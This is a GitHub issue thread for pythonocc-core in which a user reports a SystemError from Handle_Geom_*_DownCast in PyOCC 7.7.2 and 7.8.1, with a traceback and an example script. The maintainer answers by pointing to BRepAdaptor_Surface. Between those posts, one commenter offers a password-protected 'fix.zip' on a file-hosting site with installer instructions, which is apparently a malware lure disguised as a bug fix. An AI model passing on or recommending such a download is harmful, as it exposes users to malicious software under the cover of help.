tpaviot/pythonocc-core #1366: Handle_Geom_*_DownCast crash (PyOCC 7.8.1 & 7.7.2)

LaurentCmbft, 2024-08-29:
Hello, 

Here is a piece of code where I try to categorize a face using Handle_Geom_Plane_DownCast, Handle_Geom_CylindricalSurface_DownCast, ... I provide a stp as attached file (just a sphere) to test the code but same behavior is experienced on any stp file.

It works well with : 

- Python 3.7 & PyOCC 7.4.0
- Python 3.11 & PyOCC 7.7.0

However SystemError is raised with : 

- Python 3.11 + PyOCC 7.8.1
- Python 3.11 + PyOCC 7.7.2

Here is the error :
```
C:\Users\user\Projet\Miniforge311_5\python.exe C:\Users\user\Projet\Appli\Engine\error_main.py 
C:\Users\user\Projet\Appli\Engine\error_main.py :33: DeprecationWarning: Call to deprecated function BRep_Tool_Surface since pythonocc-core 7.7.1. This function will be removed in a future release, please rather use the static method BRep_Tool.Surface
  hs = BRep_Tool_Surface(face)
RuntimeError: Failed to downcast to Geom_Plane.

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "C:\Users\user\Projet\Appli\Engine\error_main.py ", line 50, in <module>
    res = get_face_types(my_topo)
                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\user\Projet\Appli\Engine\error_main.py ", line 29, in get_face_types
    face_types[current_face] = get_face_type(current_face)
                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\user\Projet\Appli\Engine\error_main.py ", line 34, in get_face_type
    if Handle_Geom_Plane_DownCast(hs) is not None:
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\user\Projet\Miniforge311_5\Lib\site-packages\OCC\Core\Geom.py", line 465, in Handle_Geom_Plane_DownCast
    return _Geom.Handle_Geom_Plane_DownCast(t)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SystemError: <built-in function Handle_Geom_Plane_DownCast> returned a result with an exception set
```

Here is the code (error_main.py): 
```
from OCC.Core.IFSelect import IFSelect_RetDone
from OCC.Core.STEPControl import STEPControl_Reader

from OCC.Core.BRep import BRep_Tool_Surface
from OCC.Core.Geom import (Handle_Geom_SphericalSurface_DownCast, Handle_Geom_ToroidalSurface_DownCast, Handle_Geom_Plane_DownCast,
                           Handle_Geom_CylindricalSurface_DownCast)
from OCC.Core.TopoDS import TopoDS_Face, TopoDS_Shape

from OCC.Extend.TopologyUtils import TopologyExplorer

def get_shape_from_path(filepath: str) -> TopoDS_Shape:
    step_reader = STEPControl_Reader()
    status = step_reader.ReadFile(filepath)

    if status == IFSelect_RetDone:  # check status
        step_reader.TransferRoot(1)
        a_res_shape = step_reader.Shape(1)
        try:
            return next(TopologyExplorer(a_res_shape).solids())
        except StopIteration:
            raise ValueError('Could not import file {}'.format(filepath))
    else:
        raise ValueError(filepath)

def get_face_types(topo: TopologyExplorer) -> dict:
    face_types = {}
    for current_face in topo.faces():
        face_types[current_face] = get_face_type(current_face)
    return face_types

def get_face_type(face: TopoDS_Face) -> str:
    hs = BRep_Tool_Surface(face)
    if Handle_Geom_Plane_DownCast(hs) is not None:
        return 'plane'
    elif Handle_Geom_CylindricalSurface_DownCast(hs) is not None:
        return 'cylinder'
    elif  Handle_Geom_SphericalSurface_DownCast(hs) is not None:
        return 'sphere'
    elif Handle_Geom_ToroidalSurface_DownCast(hs) is not None:
        return 'tore'
    else:
        return 'unkown'

if __name__ == "__main__":
    shape = get_shape_from_path(r"C:\Users\user\Desktop\dump\Sphere.stp")

    my_topo = TopologyExplorer(shape, ignore_orientation=False)
    res = get_face_types(my_topo)
```

Thank you very much for your work on PyOCC and your help !
Regards
Laurent

Anubi5x0, 2024-08-29:
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

tpaviot, 2024-09-27:
You can use a ```BRepAdaptor_Surface``` instance to check the surface type, see for instance https://github.com/tpaviot/pythonocc-demos/blob/master/examples/core_geometry_recognize_feature.py#L41

closed 2024-11-15 by tpaviot